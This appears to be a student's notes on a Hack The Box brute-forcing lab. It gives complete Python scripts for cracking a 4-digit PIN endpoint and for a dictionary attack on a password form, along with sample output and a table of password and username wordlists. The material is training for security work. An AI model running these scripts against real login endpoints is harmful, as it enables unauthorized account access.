Brute Force Attacks

Brute Force Attacks

Cracking the PIN

The instance application generates a random 4-digit PIN and exposes an endpoint (/pin) that accepts a PIN as a query parameter. If the provided PIN matches the generated one, the application responds with a success message and a flag. Otherwise, it returns an error message.

We will use this simple demonstration Python script to brute-force the /pin endpoint on the API. Copy and paste this Python script below as pin-solver.py onto your machine. You only need to modify the IP and port variables to match your target system information.

import requests

ip = "127.0.0.1"  # Change this to your instance IP address
port = 1234       # Change this to your instance port number

# Try every possible 4-digit PIN (from 0000 to 9999)
for pin in range(10000):
    formatted_pin = f"{pin:04d}"  # Convert the number to a 4-digit string (e.g., 7 becomes "0007")
    print(f"Attempted PIN: {formatted_pin}")

    # Send the request to the server
    response = requests.get(f"http://{ip}:{port}/pin?pin={formatted_pin}")

    # Check if the server responds with success and the flag is found
    if response.ok and 'flag' in response.json():  # .ok means status code is 200 (success)
        print(f"Correct PIN found: {formatted_pin}")
        print(f"Flag: {response.json()['flag']}")
        break

The Python script systematically iterates all possible 4-digit PINs (0000 to 9999) and sends GET requests to the Flask endpoint with each PIN. It checks the response status code and content to identify the correct PIN and capture the associated flag.

[!bash!]$ python pin-solver.py

...
Attempted PIN: 4039
Attempted PIN: 4040
Attempted PIN: 4041
Attempted PIN: 4042
Attempted PIN: 4043
Attempted PIN: 4044
Attempted PIN: 4045
Attempted PIN: 4046
Attempted PIN: 4047
Attempted PIN: 4048
Attempted PIN: 4049
Attempted PIN: 4050
Attempted PIN: 4051
Attempted PIN: 4052
Correct PIN found: 4053
Flag: HTB{...}

PoCs - Questions

  • After successfully brute-forcing the PIN, what is the full flag the script returns?

I use the script for get the ping and modify the ip address and port -->

And then execute the script, and WAIT-->

Dictionary Attacks

Brute Force vs. Dictionary Attack

  • Brute Force: A pure brute-force attack systematically tests every possible combination of characters within a predetermined set and length. While this approach guarantees eventual success given enough time, it can be extremely time-consuming, particularly against longer or complex passwords.

  • Dictionary Attack: In stark contrast, a dictionary attack employs a pre-compiled list of words and phrases, dramatically reducing the search space. This targeted methodology results in a far more efficient and rapid attack, especially when the target password is suspected to be a common word or phrase.

Here is a table of some of the more useful wordlists for login brute-forcing:

Wordlist
Description
Typical Use
Source

rockyou.txt

A popular password wordlist containing millions of passwords leaked from the RockYou breach.

Commonly used for password brute force attacks.

RockYou breach dataset

top-usernames-shortlist.txt

A concise list of the most common usernames.

Suitable for quick brute force username attempts.

SecLists

xato-net-10-million-usernames.txt

A more extensive list of 10 million usernames.

Used for thorough username brute forcing.

SecLists

2023-200_most_used_passwords.txt

A list of the 200 most commonly used passwords as of 2023.

Effective for targeting commonly reused passwords.

SecLists

Default-Credentials/default-passwords.txt

A list of default usernames and passwords commonly used in routers, software, and other devices.

Ideal for trying default credentials.

SecLists

Throwing a dictionary at the problem

Copy and paste this Python script below as dictionary-solver.py onto your machine. You only need to modify the IP and port variables to match your target system information.

import requests

ip = "127.0.0.1"  # Change this to your instance IP address
port = 1234       # Change this to your instance port number

# Download a list of common passwords from the web and split it into lines
passwords = requests.get("https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Passwords/Common-Credentials/500-worst-passwords.txt").text.splitlines()

# Try each password from the list
for password in passwords:
    print(f"Attempted password: {password}")

    # Send a POST request to the server with the password
    response = requests.post(f"http://{ip}:{port}/dictionary", data={'password': password})

    # Check if the server responds with success and contains the 'flag'
    if response.ok and 'flag' in response.json():
        print(f"Correct password found: {password}")
        print(f"Flag: {response.json()['flag']}")
        break
eldeim@htb[/htb]$ python3 dictionary-solver.py

...
Attempted password: turtle
Attempted password: tiffany
Attempted password: golf
Attempted password: bear
Attempted password: tiger
Correct password found: ...
Flag: HTB{...}

PoCs - Questions

  • After successfully brute-forcing the target using the script, what is the full flag the script returns?

First modify the script -->

Then exucte -->

PreviousLogin Brute ForcingNextHydra

Last updated